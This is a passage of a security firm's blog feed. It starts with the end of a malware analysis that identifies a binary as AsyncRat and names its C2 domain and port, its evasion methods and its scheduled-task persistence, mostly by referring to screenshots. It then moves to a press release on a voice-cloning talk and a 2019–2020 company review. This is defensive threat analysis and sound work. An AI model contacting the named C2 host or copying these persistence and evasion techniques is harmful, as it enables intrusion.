screenshot 1.12.</p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSGfMYLTQ238dKR5ahBsGXxqe1pa3aCNWi62YX0NzXIIY7RSJhwU6-a0L-Rg2DcOzC6nHAYrkooiYR2qYrRJFG_Ev094VBB81mfkexm1Lh0-CtTNzC1b9DsptKDCmMxAbRnzV63zmacJlc/s1177/1.12.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="185" data-original-width="1177" height="101" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSGfMYLTQ238dKR5ahBsGXxqe1pa3aCNWi62YX0NzXIIY7RSJhwU6-a0L-Rg2DcOzC6nHAYrkooiYR2qYrRJFG_Ev094VBB81mfkexm1Lh0-CtTNzC1b9DsptKDCmMxAbRnzV63zmacJlc/w640-h101/1.12.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">1.12</td></tr></tbody></table><div class="separator" style="clear: both; text-align: center;"><br /></div><p>Next, let’s have a look at what the actual malware can do.</p><p>The H6 binary is obfuscated and uses encryption through a key, has multiple evasion features against debugging, VMs (shown in screenshot 1.13), performs recon of the hosts for its hostname, AV product (shown in screenshot 1.14) etc.</p><p><br /></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnlqlALXUgRWb8A53xfBlRuYlv5zLzew0u1bImyhM1M2zn75cZ27ZjCxkMSF9poc8tqPByBkxkHeL8eh_TxypvjMlROyGc4kSOSDwwlprYd_A3-uOHqHqG6sOxv-31Vkg-pnDYmtsRjiH_/s1354/1.13.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="538" data-original-width="1354" height="254" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnlqlALXUgRWb8A53xfBlRuYlv5zLzew0u1bImyhM1M2zn75cZ27ZjCxkMSF9poc8tqPByBkxkHeL8eh_TxypvjMlROyGc4kSOSDwwlprYd_A3-uOHqHqG6sOxv-31Vkg-pnDYmtsRjiH_/w640-h254/1.13.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">1.13</td></tr></tbody></table><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7fI52HZCwguje3JoO0sllHw5hOW0_aB2hK97VIMsqeQ4nzVFy2eSwBW4Dl3w3fm6P4O8OqoWhmR8IUbFBhhp_2FX4XI2NR_gdm7Vy9TH6YN4eC-IPq9Jm0IQBwZaunU6Iea_Mjk2RxJsg/s1400/1.14.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="335" data-original-width="1400" height="153" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7fI52HZCwguje3JoO0sllHw5hOW0_aB2hK97VIMsqeQ4nzVFy2eSwBW4Dl3w3fm6P4O8OqoWhmR8IUbFBhhp_2FX4XI2NR_gdm7Vy9TH6YN4eC-IPq9Jm0IQBwZaunU6Iea_Mjk2RxJsg/w640-h153/1.14.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">1.14</td></tr></tbody></table><p>Below you can see some of its features as shown in screenshot 1.15, as well as persistence through schedule tasks on logon, by executing a .bat file as shown in screenshot 1.16.</p><div><br /></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPMj0wItNU4h05e3NJBS9P7EN2vik7UjBI8IHVIXmokt8viuMZwY7BrQRRPn7MdTNSthUAWU1pbegM_aaOaluOia4ebu5FJ1NVCngxB1PMFQ-JUUtllOx17bgBB87IpZPn7r05mTsfri8f/s1203/1.15.png" imageanchor="1" style="margin-left: auto; margin-right: auto; text-align: center;"><img border="0" data-original-height="1203" data-original-width="1060" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPMj0wItNU4h05e3NJBS9P7EN2vik7UjBI8IHVIXmokt8viuMZwY7BrQRRPn7MdTNSthUAWU1pbegM_aaOaluOia4ebu5FJ1NVCngxB1PMFQ-JUUtllOx17bgBB87IpZPn7r05mTsfri8f/w564-h640/1.15.png" width="564" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">1.15</td></tr></tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLP-ZyRYKl1rpB9YKgx-MrUJIvTQlT8hBPTus56-IghLi-B3ndmcbr8oFcs-9tJzDiLOaU529putkgb6919y5ObWt_dLft-_FUFA0IRAdBl6LmUz6J8pnZJ3rcyaANXSjtEJETpabIUikQ/s1418/1.16.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="919" data-original-width="1418" height="415" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLP-ZyRYKl1rpB9YKgx-MrUJIvTQlT8hBPTus56-IghLi-B3ndmcbr8oFcs-9tJzDiLOaU529putkgb6919y5ObWt_dLft-_FUFA0IRAdBl6LmUz6J8pnZJ3rcyaANXSjtEJETpabIUikQ/w640-h415/1.16.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">1.16</td></tr></tbody></table><p>The malware tries to reach back to the C2 domain fat7e114.ddns.net on port 6666 but also tries to reach windowsupdate.com domain possibly for trying to look legitimate as is observed in screenshot 1.17.</p><div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF9QLZ_6mBJNkFHQ6Ha9jz4TL_EcHjQiBUhm5jvs0nuyrn6uphHckg6AHmZY14wB2Qbm3Af_IlGRV4n1XuRiTMQ0riKwIx_HQmT82QsAC4tU_gqtNji6NpsGIH6hUKGVbaPO3qwH09Ou3-/s624/Picture+17.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="56" data-original-width="624" height="58" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF9QLZ_6mBJNkFHQ6Ha9jz4TL_EcHjQiBUhm5jvs0nuyrn6uphHckg6AHmZY14wB2Qbm3Af_IlGRV4n1XuRiTMQ0riKwIx_HQmT82QsAC4tU_gqtNji6NpsGIH6hUKGVbaPO3qwH09Ou3-/w640-h58/Picture+17.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">1.17</td></tr></tbody></table><br /><p>In conclusion, according to public resources the H6 binary is AsyncRat. </p><p><br /></p><p>- Blog post by Thanasis(trickster0) of Telspace Systems</p></div>break2fixhttp://www.blogger.com/profile/06040620743029387401noreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-62849559027730014622021-04-01T16:21:00.001+02:002021-04-01T16:21:58.727+02:00Telspace Systems Security Analyst Speaks about “Voice Cloning” Attacks<p><br /></p><div style="background-color: white; border-bottom-color: windowtext; border-bottom-width: 1pt; border-style: none; padding: 0cm 0cm 11pt;"><p align="center" class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: center;"><i><span lang="EN">Amy Manià to Appear at The Boston Security Meetup in April 2021</span><span lang="EN"><o:p></o:p></span></i></p><p align="center" class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: center;"><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"><o:p> </o:p></span></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><b><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;">SOUTH AFRICA, JOHANNESBURG – March 17 2021 –</span></b><b><span lang="EN" style="color: #666666; font-size: 10.5pt; line-height: 16.100000381469727px;"> </span></b><span lang="EN"><a href="https://www.telspace.co.za/" style="color: purple;"><span style="color: #1155cc; font-size: 10.5pt; line-height: 16.100000381469727px;">Telspace Systems</span></a></span><span lang="EN" style="color: #666666; font-size: 10.5pt; line-height: 16.100000381469727px;">, </span><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;">a provider of vendor-independent Information / Cyber security solutions for the public and private sectors across a broad array of industries, both local and international, announces today that one of its OSCP Certified Security Analysts, Amy Manià, will be speaking on the subject of Deep Fake and Voice Cloning at the prestigious </span><span lang="EN"><a href="https://www.meetup.com/The-Boston-Security-Meetup/" style="color: purple;"><span style="color: #1155cc; font-size: 10.5pt; line-height: 16.100000381469727px;">Boston Security Meeting</span></a></span><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"> in Cambridge, MA, in mid-April (date not yet finalised). The Meetup is a self-described “safe place” for InfoSec people to come meet like-minded people, share “cool ideas,” and discuss real issues.</span><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"><o:p></o:p></span></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"><o:p> </o:p></span></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;">The Boston area has one of the most diverse information security ecosystems in the world and the Meetup will serve as a springboard to further shine a spotlight on Ms. Manià’s industry-leading research and insights to help prevent businesses from falling victim to cyber-attacks, deep fakes, and how to keep sensitive information safe. </span><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"><o:p></o:p></span></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"><o:p> </o:p></span></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;">“Telspace underscores its commitment to protecting our customer’s financial and customer data,” states Dino Covotsos, Founder and CEO of Telspace Systems. “We see prevention as a vital aspect including educating the public, training security analysts, and helping customers get out ahead of the latest attacker tactics, techniques and procedures (TTPs). “</span><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"><o:p></o:p></span></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"><o:p> </o:p></span></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;">“When watching Deep Fake videos, I quickly realized that the software capabilities of manipulating visual material seemed to be far ahead of the audio,” states Amy Manià. “That is how </span><span lang="EN" style="color: #1d2228; font-size: 10.5pt; line-height: 16.100000381469727px;">I began to wonder about the possibilities of cloning a voice. In 2019, I was able to fool my father and a longtime friend using a software-generated version of my own voice.”</span><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"><o:p></o:p></span></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><span lang="EN" style="color: #1d2228; font-size: 10.5pt; line-height: 16.100000381469727px;"><o:p> </o:p></span></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><span lang="EN" style="color: #1d2228; font-size: 10.5pt; line-height: 16.100000381469727px;">Ms. Mani</span><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;">à</span><span lang="EN" style="color: #1d2228; font-size: 10.5pt; line-height: 16.100000381469727px;">’s body of research, entitled "Put Words In My Mouth" may be explored at </span><span lang="EN"><a href="http://the-munx.com/" style="color: purple;"><span style="color: #196ad4; font-size: 10.5pt; line-height: 16.100000381469727px;">the-munx.com</span></a></span><span lang="EN" style="color: #1d2228; font-size: 10.5pt; line-height: 16.100000381469727px;">. This links to one of her podcast appearances, a whitepaper, and recorded conference talks.<o:p></o:p></span></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"> </span></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;">To learn more about Telspace Systems, please visit</span><span lang="EN" style="color: #666666; font-size: 10.5pt; line-height: 16.100000381469727px;"> </span><span lang="EN"><a href="https://www.telspace.com/" style="color: purple;"><span style="font-size: 10.5pt; line-height: 16.100000381469727px;">https://www.telspace.com/</span></a></span><span lang="EN" style="color: #666666; font-size: 10.5pt; line-height: 16.100000381469727px;">. <o:p></o:p></span></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><span lang="EN" style="color: #666666; font-size: 10.5pt; line-height: 16.100000381469727px;"> </span></p><p align="center" class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: center;"><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"># # #</span><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"><o:p></o:p></span></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><b><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;">About Telspace Systems</span></b><b><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"><o:p></o:p></span></b></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;">Since 2002, Telspace Systems, headquartered in South Africa, has provided information / cyber security solutions for the public and private sectors both locally and internationally. Telspace focuses on vendor-independent reporting methodologies and serves a broad array of industries, including governmental, financial services, telecommunications, petroleum, logistics, entertainment, transportation, legal, human resource, and ISP’s. To learn more, please visit </span><span lang="EN"><a href="https://www.telspace.com/" style="color: purple;"><span style="color: #1155cc; font-size: 10.5pt; line-height: 16.100000381469727px;">Telspace Systems</span></a></span><span lang="EN" style="color: #666666; font-size: 10.5pt; line-height: 16.100000381469727px;"> </span><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;">and follow us on</span><span lang="EN" style="color: #666666; font-size: 10.5pt; line-height: 16.100000381469727px;"> </span><span lang="EN"><a href="https://www.linkedin.com/company/telspace-systems/" style="color: purple;"><span style="color: #1155cc; font-size: 10.5pt; line-height: 16.100000381469727px;">LinkedIn</span></a></span><span lang="EN" style="color: #666666; font-size: 10.5pt; line-height: 16.100000381469727px;">, </span><span lang="EN"><a href="https://www.facebook.com/telspacesystems" style="color: purple;"><span style="color: #1155cc; font-size: 10.5pt; line-height: 16.100000381469727px;">Facebook</span></a></span><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;">, and</span><span lang="EN" style="color: #666666; font-size: 10.5pt; line-height: 16.100000381469727px;"> </span><span lang="EN"><a href="https://twitter.com/telspacesystems" style="color: purple;"><span style="color: #1155cc; font-size: 10.5pt; line-height: 16.100000381469727px; text-decoration: none;">Twitter</span></a></span><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;">.</span><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"><o:p></o:p></span></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><br /></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><b><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;">Media Contact for Telspace Systems:</span></b><b><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"><o:p></o:p></span></b></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;">Media Team</span><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"><o:p></o:p></span></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;">Tel: +27 10 590 6163</span><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"><o:p></o:p></span></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;">Email: services@telspace.com</span><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"><o:p></o:p></span></p></div><p class="MsoNormal" style="font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; text-align: justify;"><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"> </span></p>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-89184054691808686852020-12-10T15:38:00.000+02:002020-12-10T15:38:59.204+02:00Looking back on 2019 and 2020…<div style="text-align: left;"><span style="font-size: large;">Every year we look back on the previous year and reflect on what happened, our achievements, lessons learnt etc. However, last year this fell through i.e. we did not look back on 2019 which is just as well given what happened / is happening in 2020 or maybe this is some version of the butterfly effect Ƹ̵̡Ӝ̵̨̄Ʒ (∩╹□╹∩)<br /><br /></span></div><div style="text-align: left;"><span style="font-size: large;">Okay okay we are being a bit dramatic here but it is 2020 and anything is possible, besides our newly acquired l33t ASCII art one liners ᕕ(⌐■_■)ᕗ, here are some of the highlights over the last 2 years.</span></div><div style="text-align: left;"><span style="font-size: large;"><br /></span></div><h2 style="text-align: left;"><span style="font-size: large;">I</span>nternships / Bootcamps</h2><p><span style="font-size: large;">We ran two successful internships / bootcamps, this is an important part of our strategy to contribute towards developing / nurturing local information skills in South Africa. For additional information on the two bootcamps that we ran in the past two years, refer to:</span></p><p></p><ul style="text-align: left;"><li><span style="font-size: large;"><a href="https://blog.telspace.co.za/2019/03/telspace-systems-internshipboot-camp.html">https://blog.telspace.co.za/2019/03/telspace-systems-internshipboot-camp.html</a> </span></li><li><span style="font-size: large;"><a href="https://blog.telspace.co.za/2020/01/boot-camp-2020.html">https://blog.telspace.co.za/2020/01/boot-camp-2020.html</a> </span></li></ul><p></p><p><span style="font-size: large;">From the bootcamps we ran, we ended up hiring 5 new staff members that joined our team and are now on their way to achieving great things both at Telspace and in the community (watch this space). </span></p><p><span style="font-size: large;">Those that did not make it with us, in most of the cases, ended up finding jobs at other info sec companies and / or corporates which is the exact reason we started the bootcamp, to filter more people in to the industry as a whole, not just specifically at Telspace. We also assisted those that could not find anywhere to be placed, by sending their CVs to some of our customers and / or other competitors. Below are some pictures of the bootcamp: </span></p><p></p><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-dimYxW5pgGlJ9dB4TF9VnJWKE2jXuqTyB5Ym34lMeDqVZvnaTPFGo3tKTfK0ZUc0yD_ekxwAu9U-YTQfE6UnGrRTtyhkA12BMWMHK6xZnOH2Ggnah031M-e9Ko-3qH1oIOYPj-XB7yKH/" style="margin-left: auto; margin-right: auto;"><img data-original-height="778" data-original-width="1600" height="312" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-dimYxW5pgGlJ9dB4TF9VnJWKE2jXuqTyB5Ym34lMeDqVZvnaTPFGo3tKTfK0ZUc0yD_ekxwAu9U-YTQfE6UnGrRTtyhkA12BMWMHK6xZnOH2Ggnah031M-e9Ko-3qH1oIOYPj-XB7yKH/w640-h312/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">2020 Bootcamp<br /></td></tr></tbody></table><br /><br /><p></p><h3 style="text-align: left;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoxRYTmKSz4WAnt1ptUWBFySpfDyny1zFm4xTlwm_poEOS3s0BBy8usdWI1GUD_ZVvVHM_Mm-kcl3kvQ9WnV1TN-PY93AD4O7wwuebztKD5QapVNGT6mwZbxgcCAW2VAvpQVjoqWiLnX-D/" style="margin-left: auto; margin-right: auto;"><img data-original-height="1200" data-original-width="1600" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoxRYTmKSz4WAnt1ptUWBFySpfDyny1zFm4xTlwm_poEOS3s0BBy8usdWI1GUD_ZVvVHM_Mm-kcl3kvQ9WnV1TN-PY93AD4O7wwuebztKD5QapVNGT6mwZbxgcCAW2VAvpQVjoqWiLnX-D/w640-h480/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">2019 Bootcamp</td></tr></tbody></table></h3><h2 style="text-align: left;">Talks and Research</h2><div><br /></div><div style="text-align: left;"><span style="font-size: large;">Over the last two years we have given a number of talks and facilitated training both locally and internationally, below are some of the highlights:</span></div><div style="text-align: left;"><span style="font-size: large;"><br /></span></div><h2 style="text-align: left;">Training - Hack to Basics - x86 Windows Based Buffer Overflows, an introduction to buffer overflows</h2><div><br /></div><div style="text-align: left;"><span style="font-size: large;">We gave this training at both DEF CON 1.0 China and DEF CON 27 - Vegas in 2019, it was presented by Dino and Manny, it was really great to meet up with all our friends at DEF CON and make new friends, hopefully in 2021 we will all be able to meet up again!</span></div><p><br /></p><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMCXkan4MYYYbOomkqlatbgSvw5iuGZ8AEZi3m3xUwfw19YHdrJ23z38Y1wWiG3CiW9-SYONW39_fNOsFQf411TkD8XjdiYDXdyjOiRYP0MRX-cQ74YRGGh83f1VFGbJlSJ5rJl-m2uKYi/" style="margin-left: auto; margin-right: auto;"><img data-original-height="960" data-original-width="1280" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMCXkan4MYYYbOomkqlatbgSvw5iuGZ8AEZi3m3xUwfw19YHdrJ23z38Y1wWiG3CiW9-SYONW39_fNOsFQf411TkD8XjdiYDXdyjOiRYP0MRX-cQ74YRGGh83f1VFGbJlSJ5rJl-m2uKYi/w400-h300/image.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Undercover hackers on their way to DEFCON China (no black hoody = no hacking going on here)</td></tr></tbody></table><br /><p></p><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1ssfoMZgNnWicskLrTSV-EcejtWCau5RyJThHcE3GfP7RS3s8KgZJTWb5vNHAR-CPQbbaZ8ZuN0F5KjxL3iKxiOXmje1Hu9-9_ZFTmiYAQ6s8zhvcRVJSR8LTkgk6IJKIEc8rpeSLC9q9/" style="margin-left: auto; margin-right: auto;"><img data-original-height="905" data-original-width="1208" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1ssfoMZgNnWicskLrTSV-EcejtWCau5RyJThHcE3GfP7RS3s8KgZJTWb5vNHAR-CPQbbaZ8ZuN0F5KjxL3iKxiOXmje1Hu9-9_ZFTmiYAQ6s8zhvcRVJSR8LTkgk6IJKIEc8rpeSLC9q9/w640-h480/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Epic artwork, epic venue! #HackerVibes</td></tr></tbody></table><br /><br /><p></p><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXEpJZ3F6xINc_vTMsCMpRZZIRTF6X4VdLsGqQaOIcAfZfRJrLV_-GoLAZBummkyDcwTAMjUGbp4EztWAmf0i2x4e4Z01ajYTuNPm4-mjvg99OvsTsduUuzou9IigYdWjcAP8Jv98mLfLw/" style="margin-left: auto; margin-right: auto;"><img data-original-height="841" data-original-width="1010" height="533" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXEpJZ3F6xINc_vTMsCMpRZZIRTF6X4VdLsGqQaOIcAfZfRJrLV_-GoLAZBummkyDcwTAMjUGbp4EztWAmf0i2x4e4Z01ajYTuNPm4-mjvg99OvsTsduUuzou9IigYdWjcAP8Jv98mLfLw/w640-h533/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">The actual venue where we were presenting but we totally missed the entrance and went on an adventure, thank goodness for Grifter!</td></tr></tbody></table><br /><br /><p></p><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheCmtjcdB3FcMiC5SQfZAsv8xQaK86xt4wB8TcUD5zVRah0NHbmeONvNRc_KfV5r942iHeIF205WXnOMyTasDGKrvcfZvm0YHzcy8E4szbtXpciAuWUG-9_-Zylrk0tYIS8TEq0kes7SAM/" style="margin-left: auto; margin-right: auto;"><img data-original-height="892" data-original-width="1194" height="478" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheCmtjcdB3FcMiC5SQfZAsv8xQaK86xt4wB8TcUD5zVRah0NHbmeONvNRc_KfV5r942iHeIF205WXnOMyTasDGKrvcfZvm0YHzcy8E4szbtXpciAuWUG-9_-Zylrk0tYIS8TEq0kes7SAM/w640-h478/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Our names in lights O_O</td></tr></tbody></table><br /><br /><p></p><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-BGhx_7KgQJ787rBpJVVSWBWIS-odn0d0OjIDucusMSd-cARxerAguMPQkElPgFIglQbPgTCIVJCkPH5cJtnm95vVeGsK4743OYQMiWNzU2GdOU24djaB1T3btL8y9NMAXnGs2lBBuLuF/" style="margin-left: auto; margin-right: auto;"><img data-original-height="914" data-original-width="1218" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-BGhx_7KgQJ787rBpJVVSWBWIS-odn0d0OjIDucusMSd-cARxerAguMPQkElPgFIglQbPgTCIVJCkPH5cJtnm95vVeGsK4743OYQMiWNzU2GdOU24djaB1T3btL8y9NMAXnGs2lBBuLuF/w640-h480/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">A full house for all our classes with great interactions and learning!</td></tr></tbody></table><p></p><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlOO7oN2M_KsbX7-N073hu44POC7uD9AmOCaFFbDBavgXg0ZSzu9DduIWm3mAbsiV9yNbbGHo5FOyBbrbxaIQsIy2250K3YlI6tHtAuU5RIkm4AS0YFTc5b4QbGbqkLPrXcwzswGCwNn9y/" style="margin-left: auto; margin-right: auto;"><img data-original-height="914" data-original-width="1218" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlOO7oN2M_KsbX7-N073hu44POC7uD9AmOCaFFbDBavgXg0ZSzu9DduIWm3mAbsiV9yNbbGHo5FOyBbrbxaIQsIy2250K3YlI6tHtAuU5RIkm4AS0YFTc5b4QbGbqkLPrXcwzswGCwNn9y/w640-h480/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Party time, and man was it a party 